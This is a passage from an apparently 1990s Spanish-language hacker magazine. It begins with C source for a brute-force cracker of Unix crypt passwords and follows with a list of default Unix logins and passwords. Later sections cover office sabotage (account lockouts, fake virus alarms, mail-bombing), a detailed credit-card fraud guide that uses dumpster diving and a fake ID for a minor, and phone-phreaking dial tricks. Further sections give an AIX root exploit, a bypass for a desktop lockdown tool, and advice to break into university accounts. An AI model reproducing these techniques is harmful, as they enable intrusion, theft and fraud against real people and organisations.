(cont4 = p3; cont4 < longitud; cont4++) { proceso.c6[3] = cadena[cont4]; for (cont5 = p4; cont5 < longitud; cont5++) { proceso.c6[4] = cadena[cont5]; for (cont6 = p5; cont6 < longitud; cont6++) { proceso.c6[5] = cadena[cont6]; desencripta = crypt(proceso.c6,clave); if (!strcmp(desencripta,clave)) { encontrado(proceso.c6); abandonar(); } if ((contador++) == 60000) { copia(); contador = 0; } } p5 = 0; } p4 = 0; } p3 = 0; } p2 = 0; } p1 = 0; } return; } void siete(int longitud, char *cadena, char *clave) { void encontrado(); void copia(); char *crypt(), *desencripta; int cont, cont2, cont3, cont4, cont5, cont6, cont7; int p0 = busca(longitud,cadena,proceso.c7[0]); int p1 = busca(longitud,cadena,proceso.c7[1]); int p2 = busca(longitud,cadena,proceso.c7[2]); int p3 = busca(longitud,cadena,proceso.c7[3]); int p4 = busca(longitud,cadena,proceso.c7[4]); int p5 = busca(longitud,cadena,proceso.c7[5]); int p6 = busca(longitud,cadena,proceso.c7[6]); for (cont = p0; cont < longitud; cont++) { proceso.c7[0] = cadena[cont]; for (cont2 = p1; cont2 < longitud; cont2++) { proceso.c7[1] = cadena[cont2]; for (cont3 = p2; cont3 < longitud; cont3++) { proceso.c7[2] = cadena[cont3]; for (cont4 = p3; cont4 < longitud; cont4++) { proceso.c7[3] = cadena[cont4]; for (cont5 = p4; cont5 < longitud; cont5++) { proceso.c7[4] = cadena[cont5]; for (cont6 = p5; cont6 < longitud; cont6++) { proceso.c7[5] = cadena[cont6]; for (cont7 = p6; cont7 < longitud; cont7++) { proceso.c7[6] = cadena[cont7]; desencripta = crypt(proceso.c7,clave); if (!strcmp(desencripta,clave)) { encontrado(proceso.c7); abandonar(); } if ((contador++) == 60000) { copia(); contador = 0; } } p6 = 0; } p5 = 0; } p4 = 0; } p3 = 0; } p2 = 0; } p1 = 0; } return; } void ocho(int longitud, char *cadena, char *clave) { void encontrado(); void copia(); char *crypt(), *desencripta; int cont, cont2, cont3, cont4, cont5, cont6, cont7, cont8; int p0 = busca(longitud,cadena,proceso.c8[0]); int p1 = busca(longitud,cadena,proceso.c8[1]); int p2 = busca(longitud,cadena,proceso.c8[2]); int p3 = busca(longitud,cadena,proceso.c8[3]); int p4 = busca(longitud,cadena,proceso.c8[4]); int p5 = busca(longitud,cadena,proceso.c8[5]); int p6 = busca(longitud,cadena,proceso.c8[6]); int p7 = busca(longitud,cadena,proceso.c8[7]); for (cont = p0; cont < longitud; cont++) { proceso.c8[0] = cadena[cont]; for (cont2 = p1; cont2 < longitud; cont2++) { proceso.c8[1] = cadena[cont2]; for (cont3 = p2; cont3 < longitud; cont3++) { proceso.c8[2] = cadena[cont3]; for (cont4 = p3; cont4 < longitud; cont4++) { proceso.c8[3] = cadena[cont4]; for (cont5 = p4; cont5 < longitud; cont5++) { proceso.c8[4] = cadena[cont5]; for (cont6 = p5; cont6 < longitud; cont6++) { proceso.c8[5] = cadena[cont6]; for (cont7 = p6; cont7 < longitud; cont7++) { proceso.c8[6] = cadena[cont7]; for (cont8 = p7; cont8 < longitud; cont8++) { proceso.c8[7] = cadena[cont8]; desencripta = crypt(proceso.c8,clave); if (!strcmp(desencripta,clave)) { encontrado(proceso.c8); abandonar(); } if ((contador++) == 60000) { copia(); contador = 0; } } p7 = 0; } p6 = 0; } p5 = 0; } p4 = 0; } p3 = 0; } p2 = 0; } p1 = 0; } return; } ------------------------ cortar por aqui ------------------------------------- ┌───────────────────────────────────────────────────────────────────────────┐ │ 7-CUENTAS UNIX POR DEFECTO │ └───────────────────────────────────────────────────────────────────────────┘ Los sistemas Unix suelen tener varias cuentas por defecto. Cuentas que algunos administradores algo lamers no quitan o protegen. Estas son las primeras que debemos añadir a nuestro diccionario ... por si acaso :) login passwd ---------------------- root root root system sys sys sys system daemon daemon uucp uucp tty tty test test unix unix unix test bin bin adm adm adm admin admin adm admin admin sysman sysman sysman sys sysman system sysadmin sysadmin sysadmin sys sysadmin system sysadmin admin sysadmin adm who who learn learn uuhost uuhost guest guest host host nuucp nuucp rje rje games games games player sysop sysop root sysop demo demo ┌───────────────────────────────────────────────────────────────────────────┐ │ 8-DESPEDIDA │ └───────────────────────────────────────────────────────────────────────────┘ Esto es todo por hoy. espero que te halla servido de ayuda y que me escribas si tienes alguna duda. Tambien me gustaria que me corrigierais si es que me he confundido en algo. Podeis usar y distribuir estos 3 programas pero con la condicion de que dejeis el copyright. Un saludo. ·-= Guybrush =-· [+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+][+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+] ≡ Durante la creacion de esta revista muchos sistemas han sido dañados ≡ [+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+][+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+] * COMO DESTRUIR A LA COMPETENCIA * ...En un sistema de redes... por Mr.X Si en tu trabajo todos los empleados o la mayoria trabajan delante de una terminal seguramente usar la red de la oficina en ocasiones puede ser un dolor de cabeza sobre todo si hay por ahi en algun cubiculo un "chico listo" que siempre se salga con la suya al momento de usar el sistema de la Cia. Para derrotar al chico listo y a los demas compañeros de trabajo en nuestro camino a la cima basta con hacer caso a uno de estos sencillos tips. Como ser el primero en usar la impresora de la red ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ Estas terminando tu trabajo de 25 hojas y necesitas entregarlo en menos de 5 minutos. File - Print y te vas al piso de abajo donde esta la impresora de la red. En eso ¡QUE! ahi estan enfrente de ti otras 7 personas esperando sus trabajos y resulta que el documento mas pequeño es de 30 hojas. En ese debes regresar a tu estacion de trabajo Windows y abrir el monitor de impresion. Selecciona los trabajos enfrente de ti y presiona "Pause Printing" asi los trabajos seran pausados y el tuyo permanecera activo. Cuando termine de imprimir tu trabajo no olvides de presionar "resume printing" para que nadie sospeche. Contrataca a los metiches ^^^^^^^^^^^^^^^^^^^^^^^^^ No hay peor escoria en este mundo que aquellas personas que pegan un "receipt notice" en sus mensajes. Esta feature permite a la persona que envio el mensaje saber cuando lo abriste para leerlo pero que diablos! ¿ por que alguien debe saber a que horas lees tu correo ? Lo que debes hacer es contratacar. No abras ningun mensaje con una "receipt notice" lo que necesitas hacer es usar otra feature de tu programa de comunicaciones "forward" y manda ese mensaje -sin abrir- a tu direccion. Cuando llegue a tu direccion la nota de recibo sera eliminada y podras leerlo con privacidad. La sorpresa que se llevara el lamer que haya tratado de espiar en tu privacidad cuando reciba respuesta sin antes recibir el aviso de que has leido su mensaje! Esto debe aplicarse al siguiente consejo. Protege tu fin de semana ^^^^^^^^^^^^^^^^^^^^^^^^ Es viernes y estas a punto de ir a casa. El trafico te espera pero tambien una cena o una chica en la disco que invitaste a salir del otro lado de la ciudad. Antes de irte revisas tu correo por ultima vez y encuentras un mensaje de tu jefe solicitandote todo un resumen de actividades del mes! Ese trabajo podria llevarte todo el fin de semana y tendrias que estropear tus planes. Oh no contigo ni el jefe puede, inmediatamente mandas el mensaje a una direccion inexistente para que rebote. Despues de unos segundos tendras un mensaje con un error marcado. Copia la informacion del encabezado del mensaje de tu jefe al mensaje con el error a un mensaje nuevo. Tambien copia el subject y antes de salir de la oficina presiona "send". Ahora quien podra culparte por no hacer lo que un mensaje que nunca recibiste decia ?? Roba tiempo de tu competencia ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ Si tienes que robar un poco de tiempo a tu "compañero" de trabajo y sabes que necesita entregar un reporte entonces todo lo que tienes que hacer es llegar temprano a tu trabajo y usando una terminal de la LAN como la de la impresora o una estacion de trabajo extra escribe el login de tu competencia y escribe passwords erroneos una y otra vez hasta que aparezca el mensaje "Network access denied, contact your system administrator". Ahora has lo mismo con la cuenta de tu jefe y otros 2 compañeros para evitar sospechas. Panico en la oficina ^^^^^^^^^^^^^^^^^^^^ Tu presentacion la preparaste desde hace dias y estas a punto de apantallar a tus jefes. En eso alguien intentando sabotear tu presentacion manda un mensaje a todos los del edificio mencionando un "nuevo virus" en su disco que se esta comiendo todos sus documentos urge un especialista se alcanza a leer al final del mensaje. Tu jefe -que nada sabe sobre virus- entra en panico total y ordena apagar el sistema hasta que los tecnicos revisen la red. Tu presentacion ha sido exitosamente saboteada al no poder usar ninguna de las computadoras de la compañia. De viaje y en aprietos ^^^^^^^^^^^^^^^^^^^^^^ Tu archienemigo sale de viaje y lleva consigo su leal notebook que necesita para estar conectado con la oficina -y con el jefe-. Es necesario que prepares tu estrategia desde la oficina con un archivo de 10 a 15 megas. Mandalo como attachment a la direccion de tu enemigo para bloquearlo del jefe. Pero como unos programas dejan que no reciba los attachments complicando tu estrategia has decidido mandar otros 10 megas en el cuerpo del mensaje !! Asegurate de que no exista manera de rastrear el mensaje a tu direccion y es todo lo que necesitas para mover a la competencia. [+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+][+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+] ≡ http://www.geocities.com/Baja/4426 - Mas Hits que Michael Jackson! - ≡ [+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+][+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+] ▄█████▄ ▄█████▄ ██████▄ ██████▄ ▐██▌ ▄█████▄ ▄█████▄ ██ ██▄▄▄██ ██ ██ ██ ██ ██ ██ ██ ██ ▄▄▄ ██ ██▀▀▀██ ██████ ██ ██ ██ ██ ██ ██ ██ ▀█████▀ ██ ██ ██ ▀██ ██████▀ ▐██▌ ██ ██ ▀█████▀ @ Como obtener HARDWARE gratuito @ ~~~~~~~~ Texto +original+ de Raretrip dedicado a Visa y Mastercard Con las tarjetas de credito podemos ordenar codigos de registro o passwords para entrar a sitios con material pornografico y pedirlos a una cuenta de correo anonima pero que pasa cuando queremos obtener hardware? Quiero darles una idea de como obtener equipo para nuestra computadora, videos de musica, cassettes o regalos para la abuela y novia sin tener que gastar un peso ni arriesgar nuestra libertad. Para empezar a planear una compra usando la informacion de una tarjeta de credito primero necesitas conseguir los datos de la cuenta. Esto es lo mas importante de todo. Para obtenerla puedes usar el sistema de computo de un hotel o restaurant donde casi siempre tienen los numeros de tarjeta y direcciones de los dueños disponibles en cualquier terminal. Si conoces alguien que trabaje en la recepcion de un hotel ofrecele dinero por la informacion en ocasiones puedes hacer esto sin conocer al trabajador por medio de un amigo o conocido. El problema de conseguir los numeros de tarjeta de las copias carbon es que no se consigue la direccion o numero telefonico aunque esto tambien tiene una solucion y se conoce como: directorio telefonico. Si te diriges a la zona turistica de tu ciudad y recojes una o dos bolsas de basura seguramente encontraras mas de 20 hojas amarillas o copias carbon con la informacion basica del dueño de la tarjeta. La informacion que se obtiene de una copia amarilla de la tarjeta es: Nombre: Numero de Cuenta: Fecha de Expiracion: Tipo de tarjeta: Visa o Mastercard de acuerdo a los digitos. Esta es toda la informacion necesaria para hacer una compra en internet de software. Pero para comprar digamos un modem o algo mas grande es necesaria mas informacion para que parezca una compra legitima. La informacion necesaria para hacer una compra por telefono o en internet de Hardware es: Nombre: \ Numero de Cuenta: \_____ Estos datos son faciles de conseguir. Fecha de Expiracion: / Tipo de tarjeta: / Direccion: \ Codigo Postal: \_____ 4 datos mas...eso significa mas trabajo! Ciudad: / Pais: / Asi que ya conseguiste los primero 4 datos buscando entre la basura de un restaurant o alguna tienda . . . ahora que ? Tienes dos opciones una mas facil que la otra: 1) Comprar codigos de software. 2) Comprar cualquier cosa que quieras. Si te decides por la primera opcion puedes dirigirte a cualquier tienda en internet y comprar los codigos de cualquier programa shareware pero si lo que quieres es la segunda opcion no uses la informacion para ninguna compra y espera hasta que consigas toda la informacion necesaria. RECUERDA: No uses dos veces la misma tarjeta o direccion! Para conseguir la direccion simplemente usa alguna guia telefonica o base de datos como las que se pueden encontrar en American Online o Compuserve. Cuando tengas la direccion puedes deducir el codigo postal, la ciudad y el pais con facilidad. Solo existe un problema, que pasaria si no tienes acceso a las bases de datos? Pues adios compra. Por eso es importante que tengas contactos en hoteles o restaurantes ya que ellos pueden conseguir toda la informacion en sus computadoras. Otra cosa que puedes hacer es conseguir numeros de tarjetas locales asi la direccion estara disponible en tu guia de telefonos local. Para conseguir numeros de tarjeta de personas que vivan en tu localidad todo es tan simple como visitar el basurero de una tienda indispensable para los locales y no una para los turistas. Supongamos que encuentras la direccion donde vive el dueño de la tarjeta en tu guia local y ahora necesitas su codigo postal verdad? Pues hablale por telefono y preguntale! O visita tu oficina postal y ahi investiga en esos utiles mapas con los codigos que tienen ellos :-) Ahora que tienes los 8 datos necesarios es hora de pasar a... .Conseguir la direccion destino De nada te servira pedir cualquier cosa si va a terminar en la casa del dueño de la tarjeta por eso necesitas una direccion donde puedan enviarte lo que pidas pero como hacerlo? SIMPLE! Si vives en cualquier estado de Mexico esta es la parte mas facil. Consigue a un menor de edad (14 a 15 años) y crea una credencial falsa de estudiante usando un scanner de fotografias y una impresora a color con buena resolucion (disponibles en cualquier negocio de diseño grafico). Ahora lo necesario antes de ir a tu oficina de correos local es una credencial con un nombre inexistente de alguna secundaria o prepa local y 50 pesos para pagar la cuota por un apartado postal por el resto del año y una actitud segura. Puedes pedir a un amigo de unos 15 años que te haga el favor de comprar un apartado postal, si acepta entonces falsifica una credencial y cambia el numero de matricula. El costo aproximado de la I.D. falsa es de 25 pesos (scaneado e impresion). Si tu eres o pareces menor de edad entonces tu puedes ir a tu oficina de correos con la credencial y 50 pesos (eso cuesta un apartado postal). En menos de 25 minutos tendras ya la llave de un apartado postal a nombre de alguien inexistente y 50 pesos menos. Si te dan problemas los de la oficina de correos (nunca lo hacen) di que te iniciaste en un programa de correspondencia y el correo no llega hasta tu colonia. Inmediatamente te daran el apartado (pagando desde luego) y te pediran una identificacion que puede ser una credencial escolar que debe ser modificada preferentemente ya que anotaran el nombre y numero de matricula pero no guardan copia de la foto o la credencial. Ahora ya tienes una direccion donde podras recibir tu pedido...perfecto! .Hacer la orden Primero necesitas saber que vas a pedir. Esto puedes hacerlo por medio de catalogos, programas de television o tiendas en internet. Las tiendas en internet debes buscarlas usando una maquina de busqueda como www.infoseek.com y busca "tienda electronica" o "plaza virtual". Ya que hayas encontrado la tienda o negocio donde vayas a realizar la compra debes hacer la llamada o llenar la forma en caso de ser una compra en internet. Como antes se ha dicho es SUPER NECESARIO EL ENVIO INMEDIATO de lo que pidas. Asegurate de que el pedido sea enviado cuando mucho al dia siguiente por paqueteria aerea. Este es realmente el unico problema ya que la mayoria de las tiendas en linea piden de 3 a 4 semanas para enviar el paquete. Una forma de contrarrestar esto es por medio de una compra telefonica que es lo que recomendaria mas. Antes de dar la informacion de la tarjeta a la operadora asegurate de preguntar sobre paqueteria aerea y preguntar cuanto costara casi siempre es 15% o 20% mas del precio de lo que pidas. Acepta, dales la informacion y cuelga. Si por algun motivo te piden un numero telefonico no dudes en darles un numero que siempre de tono de ocupado o alguno desconectado. Por ahi me entere de que en ocasiones piden mandar una copia de la tarjeta de credito o de la ficha de deposito pero aun no me he encontrado ninguna compañia que lo pida excepto uno que otro proveedor de espacio web. En geocities con la informacion de la tarjeta puedes conseguirte 5 megas! Decirte COMO hacer la llamada no tiene caso es tan facil como seguirle la corriente a la operadora y darle los datos -EXCEPTO- cuando pregunta ¿ Desea que su pedido sea enviado a la direccion donde se cobra la tarjeta ? Ahi es donde debemos mostrar nuestro conocimiento de ingenieria social y decir algo como: "No, es un regalo para mi esposa(o)/hermano(a)/hijo(a) y no deseo que se de cuenta cuando llegue el paquete ¿podria enviarlo al apartado postal #0000?" O tambien: "No, estoy usando la tarjeta de la compañia y preferiria que llegara a..." Otra vez, *NO* ofrezcas la informacion de la tarjeta hasta que te aseguren que pueden enviar el paquete en menos de 2 a 5 dias. Entre mas tiempo se tarde en llegar algo, mas probabilidad existe de que te agarren. .Recoger la mercancia En un articulo anterior que aparecio en esta revista se menciona este paso como el mas dificil pero si no han pasado mas de 2 o 3 dias desde que hiciste el pedido no existira problema alguno. Simplemente vas con tu llave del apartado postal a la oficina de correo temprano y sacas tu paquete rapido. Procura usar un sistema de transporte publico para alejarte del lugar por si las dudas... Es necesario recordarte que no vuelvas a usar el mismo apartado bajo ninguna circunstancia y cuando tengas lo que hayas pedido nunca se te ocurra decir como lo obtuviste. Cuando completes tu primer compra con carding espera algun tiempo antes de empezar a usar lo que pediste y no tires las envolturas ya que en caso de que algo te haya salido mal solo necesitaras regresar la mercancia tal y como la recibiste para salir del aprieto :-) .Apendice Vendedores por Telefono en Mexico: ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ CV directo ~~~~~~~~~~ * Entregan de 3 a 5 dias * Aceptan Bancomer, Banamex, Mastercard, etc. * Pregunta por Catalogo. Tienen equipo de computo pero tambien maquinas de ejercicio, cuchillos, medicinas, videos, etc. * 01 (5) 6288528 Desconocido ~~~~~~~~~~~ * No se cuanto tarden en entregar. * Aceptan Bancomer, Banamex, Mastercard, etc. * Pregunta por Catalogo. Tienen muchos productos. * 01 (5) 2781141 Excusas validas en caso de aprietos: ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ " No se como llego este paquete a mi direccion! Alguien debio haberlo enviado aqui por equivocacion... " " Pense que alguien de la casa lo habia pedido pero cuando les pregunte quien fue todos dijeron que no era de ellos asi que decidi guardarlo hasta que supiera de quien era... " " Oh dios mio asi que asi fue como llego esto a mi direccion ¿Eh? " [+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+][+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+] ≡ http://www.microsoft.com " Que sistema quieres hackear hoy ? " ≡ [+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+][+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+] ******************* > PHREAKING & HACKING < ******************* "No hay nadie mas esclavisado que aquel que falsamente piensa que es libre." Bien primero que nada me llamo Azum Lord y este truco sirve para tener llamadas totalmente !!! GRATIS !!!! y es el siguiente: Tienes que escribirlo tal y como esta incluyendo el #. Primero marcas: 91 800 92 450 # Despues te contesta una operadora y marcas lo sig. 100 54 # Y despues 10 54 # Y para finalizar 00 91 84 ( Aqui va el telefono a donde quieres hablar ) # NOTA: En el ejemplo de arriba el 84 es el codigo de la ciudad a donde quieres hablar en este ejemplo es de Saltillo Coahuila, Mexico. Por el momento el truco ya no funciona dentro de Saltillo pero puede hacerlo de otras partes. Para llamar gratis de un telefono gratuito: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Primero marcas a un numero gratituo antes (91 800) ahora (01 800) cuando contesten lo que tienes que hacer es hacer que el que te conteste te cuelgue e.j. Cia -Bueno habla XXXXX en que le puedo ayudar??? Hacker -Si bueno quien habla???? Cia -Bueno???? Hacker -Bueno, Bueno, Bueno Señorita que se le ofrece??? Cia -*&^$%@#$(*&$#@ Y ahi esta, ella te cuelga y te deja con tono y puedes hacer tu llamada. je, je };-) Nota: En algunos telefonos de tarjeta les cancelan este tipo de llamadas. [ Este truco no sirve en telefonos publicos Telnor de tarjeta y moneda. De hecho aun no se en que tipo de telefonos funcione ;) ] Si alguien tiene problemas con un sistema AIX 3.x la forma mas sencilla de conseguir r00t es usando el comando rhost como en el siguiente ejemplo: % rhost (host) -l -froot ^ | | |________________ El host con el sistema AIX (Unix de IBM) |--- Representa el prompt! Y !!!! Bingo ¡¡¡¡ tienes el root antes de entrar te recomiendo que tengas preparado un zap, sniffer o caballo de troya listos para ser compilados te lo digo por experiencia :-( si tienen algun sniffer para AIX 3.2 les pido me lo manden :-). [ Y tambien a la revista :) ] Si quieren conseguir bugs, exploits, sniffers, zaps, listas de palabras, hasta software benigno de seguridad visiten esta pagina de rumania: http://sunshine.nextra.ro Tambien hay un enlace para una pagina donde hay exploits, trojans ping's of death, etc. para WinNT !!!!!. Listas de Palabras: ftp://sable.ox.ac.uk/pub/wordlists/ ftp://sun.rediris.es/mirror/sable/wordlists/ Esta es una BBS del merito Monterrey N.L. sinet.sinet.com.mx ~~~~~~~~~~~~~~~~~~ Para registrarse en el login se escribe bbs ya adentro para registrarte te tienen que enviar un mail pero no se tarda mas de 1 min. ∩\∩\∩\∩\∩\∩\∩\∩\∩\∩\∩\∩\∩\∩\∩\∩\∩\∩\∩\∩\∩\∩\∩\∩\∩\∩\∩\∩\∩\∩\∩\∩\∩\∩\∩\∩\∩\∩\∩\ U\U\U\U\U\U\U\U\U\U\U\U\U\U\U\U\U\U\U\U\U\U\U\U\U\U\U\U\U\U\U\U\U\U\U\U\U\U\U\ Esta es una forma de hackear el programa Crow Control que regula algunas funciones de windows como por ejemplo quita el comando ejecutar, ayuda, configuracion y buscar del menu inicio, quita las funciones del boton derecho del mouse el MSDOS y el explorer, tambien al iniciar la computadora no lee la unidad a:, incluso oculta la unidad C:, a simple vista parece imposible quitarlo pero si te vas al wordpad en accesorios, seleccionas Abrir, luego parece que no hay unidad c: pero tu escribes c:\autoexec.bat y bingo aparecen los directorios y entonces comienzas a editar y agregas estas lineas: cd\ cd archiv~1 (la mayoria de las veces esta aqui recomiendo que lo verifiques antes de editar el autoxec.bat ) path=c:\windows\command\ deltree /y crow*.* Y listo ahora solo tienes que reiniciar y de esta forma es facil quitar el Crow Control aunque tambien funciona con otros programas parecidos. [ Si quisieramos remover el programa pero no permanentemente editariamos el autoexec.bat de esta forma: cd\ cd archiv~1 md temp path=c:\windows\command\ move crow* temp Ahora todos los archivos del programa Crow habran quedado en: C:\ARCHIVOS\TEMP\CROW* ( * representa el nombre del directorio completo ) ] 3zP3r0 Ke L3z gUz73 ..... AzumLord@Hotmail.com [+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+][+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+] ≡ Y ahora un StripTease por . . . Cinthia !! ≡ [+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+][+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+] LOS HACKERS DE LAS MACINTOSH ~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Macz l0v3r:Nopal Picudo ^^^^^^^^^^^^^^^^^^^^^^^ Entre los downloads mas populares en internet estan varias aplicaciones y extensiones escritas por Greg Landweber. Probablemente no reconozcas el nombre de este matematico graduado de Harvard, musico y desarrollador de shareware. Pero probablemente hayas escuchado de Aaron, la extension que modifica la interfaz de la Mac para verse como el sistema prometido de Apple "System 8". Y quizas hayas probado BeView, que hace parecer a tu Mac como el proximo BeOS. Recientemente Landweber, con amigos como Ed Voas y Fred Bass sacaron Kaleidoscope, una version mejorada de Aaron que ofrece una variedad de colores como Onyx y Ice. Hasta el momento la mayoria de las "escenas de colores" son un poco raras por ejemplo una de las escenas cambia el boton de cerrar ventana por una esfera rosa. Lo mejor de Kaleidoscope es que permite a cualquier desarrollador escribir sus propios diseños para la Mac. Algunos diseños nuevos como Star Wars estan saliendo. Kaleidoscope no añade ninguna funcion practica a las Macs - añade otra cosa que habia sido desterrada: diversion, en algunos casos hermosa. La primera Mac nos dio iconos, menus de cascadas, ventanas y el puntero. Pero Apple se ha dormido en el volante. Afortunadamente Landweber, Voas y Bass estan manteniendo viva la tradicion de diseño ingenioso de Apple. Si lo que buscas es funcionalidad, el browser de Greg ofrece una simple pero inovadora forma de acceder a los contenidos de tu computadora. La ventana del monitor se divide en 3 o 4 paneles que te permiten desplazar por todo el disco duro manteniendo la vista en distintos directorios al mismo tiempo - puedes encontrar archivos sin abrir demasiadas ventanas. Tambien podrias arrastrar hasta 8 iconos en espacios colocados en la parte superior de la pantalla para acceso instantaneo. La mejor cosa de este browser es que permite sumergirnos en archivos stuffit tan facil como si fueran directorios. El shareware que Greg's produce para las Macs lo puedes encontrar en: http://greg.math.harvard.edu Mientras Apple se fusiona con la nueva generacion de sistemas operativos - Rhapsody esta prometido para 1998 - Landweber nos permite probar la interfaz del futuro ahora. Apple recientemente contrato a Ed Voas el co-desarrollador de Aaron para dirigir la division de diseño. Parece que Apple reconoce al talento cuando lo ve. [+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+][+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+] ≡ ¿¿RareGaZz?? Punks!! ≡ [+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+][+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+] + CYBERsitter + "¿a donde NO quieres que vayan hoy?" Solid Oak Software, los creadores de CYBERsitter promueven su producto como una forma mediante la cual los padres podran "limitar el acceso de los niños al material dudoso de Internet". Pero la lista de web sites, palabras y frases que son filtradas por el programa estan guardados en un archivo encriptado por lo que ni los usuarios registrados pueden saber que es exactamente lo que CYBERsitter bloquea excepto intentando y fallando. Como resultado de esto, poca gente sabia en realidad que era lo que este programa bloqueaba a los usuarios pero en Julio de 1996 varios grupos que apoyan los derechos de gays/lesbianos se quejaban que Cybersitter filtraba las palabras "homosexual" y "gay rights" de las paginas web. Entre los sitios bloqueados se encuentran la Organizacion Nacional de las Mujeres http://www.NOW.org y la Organizacion de los Derechos Humanos de Gays en http://www.iglhrc.org. Ese Julio, un articulo fue publicado en CyberWire por Brock Meeks que advertia del tipo de material que era bloqueado por CYBERsitter, Cyber Patrol y Net Nanny. El articulo esta disponible en: http://www.eff.org/pub/Publications/Declan_McCullagh/cwd.keys.to.the.kingdom.0796.article Brian Milburn, CEO de Solid Oak Software, amenazo con una investigacion criminal por medio del FBI quejandose que el conocimiento de la gente del material bloqueado por su programa devaluaba su producto: http://peacefire.org/archives/SOS.letters/bm.2.dm.8.15.96.txt En noviembre de 1996, Peacefire publico una pagina que criticaba a CYBERsitter en: http://www.peacefire.org/censorware/CYBERsitter/ exponiendo mas paginas, palabras y frases que el programa bloqueaba. Ahora, CYBERsitter esta bloqueando el web site de Peacefire entero y ha amenazado con una demanda contra Peacefire por publicar la pagina. CYBERsitter tambien ha bloqueado `The Ethical Spectacle' por publicar una copia de este articulo. En respuesta a CYBERsitter se creo el programa CSDECODE.EXE que permite a cualquier persona que tenga una copia de este programa saber que tipo de websites y palabras filtra este programa. Este programa es considerado un fuerte golpe contra las ventas de Cybersitter. Por otro lado yo creo que es un alivio para los padres el dejar la responsabilidad moral y social de educar a sus hijos a una pieza de software. Despues de todo nuestros padres no son mas que codigo amaestrado y repleto de bugs asi que si una compañia promete reemplazarlos y de paso quitarles la molestia de educar a sus hijos ¡fenomenal! ¡Viva la mediocridad en las familias! - ¡viva la irresponsabilidad! ¡¡ VIVA CYBERsitter !! El programa puedes bajarlo aqui : http://www.pow-dist.co.uk/solidoak/cyber.html ftp://ftp.pow-dist.co.uk/pub/demos/cybsetup.exe Y el crack para ver la lista de sitios bloqueados puedes bajarlo en la pagina de software de la revista seccion Internet. Original por: Bennett Haselton Llevado a la pantalla por: LePompeItor [+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+][+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+] ≡ Y ahora un ensayo sobre la inmortalidad del espiritu... ≡ [+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+][+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+] * PUERTOS * cmeinel@techbroker.com Un puerto en la computadora es por donde la informacion fluye hacia dentro o hacia fuera. Los dispositivos Hardware como la impresora o modem pueden ser llamados puertos, un puerto que manda informacion fuera de tu computadora puede ser el monitor o la impresora. Un puerto que recibe informacion seria el modem o un scanner. La diferencia entre un puerto de Internet a un puerto comun es que un Host de internet tiene muchos mas puertos que un computadora tipica. Ademas, los puertos de un Host no son Hardware sino software y estan identificados por su numero que los identifica y define sus funciones. El "surfeo de puertos" es cuando se estudian todos los puertos de un Host buscando una forma de entrar al sistema. El surfeo de puertos se aprovecha de la estructura del protocolo TCP/IP. El protocolo TCP/IP como ya se ha dicho muchas veces es el conjunto de reglas que usan las computadoras conectadas a internet para poder compartir datos. Una de las funciones mas basicas de UNIX es asignar un puerto a cada funcion que una computadora quiera que otra haga. Los ejemplos mas comunes podrian ser el puerto para mandar email (25), Telnet(23), ftp(21) y http(80). Cuando el browser quiere leer una pagina web contacta al Host usando el puerto numero 80 y le dice a la computadora que maneja ese sitio web que te deje entrar. Y seguramente, te dejaran entrar y leer la pagina sin la necesidad de un login o password. La mayoria de las computadoras en internet te permitiran usarlas sin la necesidad de un password. Esto es gracias a los standards de internet. A pesar de que ningun manual de unix te enseñara como hacer el surfeo de puertos esto es basico para lograr entrar en un sistema si no tenemos ninguna otra forma de hacerlo (logins defaults, bugs). El surfeo de puertos es necesario para localizar debilidades en un sistema y explotarlas, si queremos evitarnos trabajo podemos usar un programa como Satan o Netcat. Estos programas que puedes ejecutar desde Linux, FreeBSD o cualquier tipo de UNIX desde la PC y avisaran que puertos de un host estan en uso y checaran cada uno en busca de fallas y avisaran cuales son. Obviamente las primeras personas que usan estos programas son los administradores de sistemas por lo que se recomienda hacer esto manualmente conociendo los errores mas nuevos de sendmail, daemon o http. Si quieres empezar en el surfeo de puertos con el pie derecho es necesario una cuenta de tu ISP que te permita usar Unix, como esto es hoy en dia muy dificil de conseguir lo mas sencillo que puedes hacer es hackear una cuenta de alguna universidad o preparatoria donde permitan compilar y usar todos los comandos Unix. Otra forma de obtener una cuenta SHELL es pagando a tu universidad o centro de estudios local por una cuenta si no puedes accesar a esta cuenta via dial-up (numero telefonico) con un programa de comunicaciones entonces tendras que usar tu conexion PPP con un programa Telnet, de ahi usa telnet para conectarte a la universidad y listo. Estaras dentro una cuenta shell. Si quieres conocer y examinar un dominio y ver que computadoras lo usan para entrar a internet usamos el comando whois. El siguiente ejemplo es el original de este archivo y en seguida mostrare algunos otros. # whois 